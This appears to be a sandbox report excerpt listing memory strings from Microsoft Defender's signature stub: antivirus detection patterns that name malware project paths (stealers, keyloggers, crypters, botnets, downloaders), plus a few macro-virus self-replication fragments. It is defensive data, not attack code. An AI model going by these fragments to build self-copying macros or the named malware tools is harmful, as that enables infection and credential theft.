Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: .+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: .+:\\HELLS.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: \sYs__Tem.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	Binary or memory string: \proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: \WebCounter\Source\WebCounter.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: .\LoardR0x\System NT.vbp
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.sln.\|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: $Neagato_Hotela.vbp]
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: <iXato\PharOlniNe\Proyecto1.vbp]
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: ,'.+:\\SoUrCe.!\\.SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: LD:\Master\bb_soft\n_07_10_2008\dll.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: UPD:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: \ffzefzefz.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: C:\\.A.\\B\\Base.vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: LD:\Master\bb_soft\n_13_10_2008\dll.vbp
Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp	Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: bTOYANO\otros virusillos\shell32\devil shell32.vbp
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: 2\folder_x\File Folder.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: \po\Cdmator.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: $\WEBPNT\weBpnt.VBp
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: Serega\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: A<C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: rypter\stub.vbp]
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: SN.+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp	Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: `D:\Master\bb_soft\n_07_10_2008\bb_bho\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Software\Hacking Tools\DDOS tools\STRESS\BBHH-DoS\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: mt Download .vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: PE:\Coba Software\Virus\BRR\MOTTO_BRR.vbp
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: D:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: ?:.+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: :D:\Master\bb_soft\new\dll.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: \loaderFirefox.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: stub.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	Binary or memory string: AC:\puxa\lenda.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: .vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: BD:\Master\bb_soft\not_est\dll.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.pia de.fab\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: D:\\Apple\\VB.google\\.\.vbp
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: 8my programs\I_R\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp	Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: \|C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
